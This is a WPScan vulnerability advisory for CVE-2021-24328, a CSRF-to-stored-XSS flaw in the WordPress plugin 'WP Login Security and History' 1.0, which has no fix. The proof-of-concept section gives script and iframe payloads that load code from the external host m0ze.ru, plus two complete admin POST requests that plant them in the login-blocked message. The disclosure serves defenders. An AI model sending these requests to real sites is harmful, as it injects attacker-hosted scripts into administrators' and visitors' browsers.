WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Login Security and History <= 1.0 - CSRF to Stored Cross-Site Scripting (XSS)

Description

The plugin did not have CSRF check when saving its settings, not any sanitisation or validation on them. This could allow attackers to make logged in administrators change the plugin's settings to arbitrary values, and set XSS payloads on them as well

Proof of Concept

### -- [ Payloads: ]

[$] "><script src=https://m0ze.ru/payload/a.js></script>

[$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>


### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Blocker page message: ]

[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 252
Cookie: [admin cookies]

can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Blocker page message: ]

[!] POST /wp-admin/options-general.php?page=wp_login_security_and_history.php&page_num=%22+onmouseover%3Dalert%28%29+1&tab=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Cookie: [admin cookies]

can_show_captcha_option=1&show_captcha_count_option=1337&can_block_login_trials=1&login_max_trials=1337&login_block_time=13&login_blocked_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++

Affects Plugins

wp-login-security-and-history
No known fix - plugin closed

References

CVE
CVE-2021-24328
URL
https://m0ze.ru/exploit/csrf-wp-login-security-and-history-v1.0.html
URL
https://m0ze.ru/vulnerability/[2021-03-29]-[WordPress]-[CWE-352]-WP-Login-Security-and-History-WordPress-Plugin-v1.0.txt
URL
https://m0ze.ru/vulnerability/%5B2021-03-29%5D-%5BWordPress%5D-%5BCWE-79%5D-WP-Login-Security-and-History-WordPress-Plugin-v1.0.txt

YouTube Video

Classification

Type

CSRF

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

Yes

WPVDB ID
eeb41d7b-8f9e-4a12-b65f-f310f08e4ace

Timeline

Publicly Published

2021-04-12 (about 1 years ago)

Added

2021-05-17 (about 1 years ago)

Last Updated

2021-05-24 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin